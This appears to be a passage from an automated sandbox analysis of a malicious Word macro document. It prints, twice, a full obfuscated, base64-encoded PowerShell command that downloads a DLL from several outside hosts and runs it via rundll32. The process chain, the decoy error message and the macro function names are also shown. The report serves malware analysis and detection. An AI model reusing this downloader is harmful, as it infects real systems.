                      Jan 12, 2021 20:31:37.597510099 CET368INData Raw: f5 9b 78 9b 5b 6d 28 e0 da e2 da 1d d7 40 f4 b4 a8 78 08 d3 72 1f c3 dc 91 3a dc d6 60 83 1b 46 3b 30 c5 e1 82 e5 d6 e5 43 2e 4f 2e fd 8d 47 10 a0 d6 85 77 ef 7b b9 4d 33 54 b7 29 1e fd be 21 28 68 cc 59 e4 f7 7c 01 f1 ac 57 10 97 74 78 c4 66 3c
                      Data Ascii: x[m(@xr:`F;0C.O.Gw{M3T)!(hY|Wtxf<V=WPx&ZrS!P?Na8kT!>j=Ikrb4"\3pus>s)(*VpKXsYV DZe({3>ROyf
                      Jan 12, 2021 20:31:37.597558022 CET368INData Raw: fe 2e c0 7e 11 a3 81 80 5d 4f 65 04 b4 81 16 14 f2 e8 aa 16 5f 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: .~]Oe_0


                      Code Manipulations

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      Analysis Process: WINWORD.EXE PID: 2336 Parent PID: 584

                      General

                      Start time:20:30:34
                      Start date:12/01/2021
                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Imagebase:0x13f120000
                      File size:1424032 bytes
                      MD5 hash:95C38D04597050285A18F66039EDB456
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Chronological Activities

                      Analysis Process: cmd.exe PID: 1100 Parent PID: 1220

                      General

                      Start time:20:30:35
                      Start date:12/01/2021
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA=
                      Imagebase:0x4a3f0000
                      File size:345088 bytes
                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: msg.exe PID: 2572 Parent PID: 1100

                      General

                      Start time:20:30:36
                      Start date:12/01/2021
                      Path:C:\Windows\System32\msg.exe
                      Wow64 process (32bit):false
                      Commandline:msg user /v Word experienced an error trying to open the file.
                      Imagebase:0xff0f0000
                      File size:26112 bytes
                      MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: powershell.exe PID: 2552 Parent PID: 1100

                      General

                      Start time:20:30:36
                      Start date:12/01/2021
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA=
                      Imagebase:0x13fab0000
                      File size:473600 bytes
                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      Chronological Activities

                      Analysis Process: rundll32.exe PID: 2332 Parent PID: 2552

                      General

                      Start time:20:30:40
                      Start date:12/01/2021
                      Path:C:\Windows\System32\rundll32.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
                      Imagebase:0xffdd0000
                      File size:45568 bytes
                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: rundll32.exe PID: 2760 Parent PID: 2332

                      General

                      Start time:20:30:40
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: rundll32.exe PID: 2732 Parent PID: 2760

                      General

                      Start time:20:30:41
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: rundll32.exe PID: 1980 Parent PID: 2732

                      General

                      Start time:20:30:42
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: rundll32.exe PID: 2724 Parent PID: 1980

                      General

                      Start time:20:30:43
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: rundll32.exe PID: 2500 Parent PID: 2724

                      General

                      Start time:20:30:44
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: rundll32.exe PID: 1776 Parent PID: 2500

                      General

                      Start time:20:30:45
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: rundll32.exe PID: 2808 Parent PID: 1776

                      General

                      Start time:20:30:45
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: rundll32.exe PID: 3068 Parent PID: 2808

                      General

                      Start time:20:30:46
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: rundll32.exe PID: 3012 Parent PID: 3068

                      General

                      Start time:20:30:47
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Disassembly

                      Code Analysis

                      VBA Code

                      Call Graph

                      Graph

                      Module: Gx8fznt8p0b

                      Declaration
                      LineContent
                      1

                      Attribute VB_Name = "Gx8fznt8p0b"

                      Executed Functions
                      Function Bn2p1rxokklh_9o8, APIs: 134, Strings: 5, Number of lines: 194, Relevance: 253.944
                      APIsMeta Information

                      Xaem5y61ivq

                      Hj9iyfe3bvb

                      StoryRanges

                      wdMainTextStory

                      Xrsb1iydy1_t2h

                      ykgfGkNf

                      Fix

                      BzbdEl

                      BzbdEl

                      Fix

                      Fix

                      mZXJjJAgq

                      Fix

                      JfXdCsEp

                      JfXdCsEp

                      Fix

                      Fix

                      MSsFhG

                      Fix

                      DJlZDCM

                      DJlZDCM

                      Fix

                      Fix

                      VDhTuRJ

                      Fix

                      QWDldHHR

                      QWDldHHR

                      Fix

                      Fix

                      Mid

                      Name

                      Application

                      FBkjB

                      Fix

                      reejhCJo

                      reejhCJo

                      Fix

                      Fix

                      ICwOHad

                      Fix

                      PNjoAGP

                      PNjoAGP

                      Fix

                      Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: zCXyyY

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: JSrfhd

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: JSrfhd

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: szALCGBF

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: XFTxEQJDN

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: XFTxEQJDN

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

